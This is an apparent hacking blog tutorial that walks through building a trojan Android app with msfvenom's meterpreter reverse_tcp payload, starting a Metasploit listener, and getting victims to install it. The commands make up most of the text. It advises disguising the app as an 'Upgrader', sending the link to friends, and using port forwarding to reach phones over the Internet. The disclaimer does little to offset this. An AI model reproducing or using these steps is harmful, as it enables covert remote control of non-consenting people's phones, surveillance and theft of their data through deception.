Kali Linux Tutorial: How To Hack Android Phone remotely using Metasploit
We knew that Hackers can Hack any device and any system but What about Android? As Penetration testers you need to learn all types of Hackings on different systems!
On K4linux we will share with you a series of courses that will teach you skills of a perfect hacker! Read more about Penetration Testing With Kali Linux.
Disclaimer: This tutorial is for educational purposes only and we are NOT responsible in any way for how this information is used, use it at your own risk.
Step 1 Fire-Up Kali:
Open a terminal, and make a Trojan .apk you can do this by typing :
root@kali:~# msfvenom android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)
Step 2 Open Another Terminal:
Open another terminal until the file is being produced. Load metasploit console, by typing :
Step 3 Set-Up a Listener:
After it loads(it will take time), load the multi-handler exploit by typing :
root@kali:~# use exploit/multi/handler
Set up a (reverse) payload by typing :
root@kali:~# set payload android/meterpreter/reverse_tcp
To set L host type :
root@kali:~# set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)
Step 4 Exploit!
At last type: exploit to start the listener.
Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
Then send it using Uploading it to Dropbox or any sharing website.
Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Let the Victim install the Upgrader app (as he would think it is meant to upgrade some features on his phone)
However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
And when he clicks Open…
Step 5 BOOM!
There comes the meterpreter prompt:
All the steps for this tutorial are explained on a Video on our Youtube Channel you can subscribe to it by this link they are many other tutorials that you can learn about bypassing and hacking and others basics tutorials about kali linux.
If you have encountered a problem or you have any questions or remarks please feel free to set a comment.
If this article helped you to solve your problem please feel free to Share it with your friends. with Love and Prosperity K4LINUX-TEAM.
Source : nb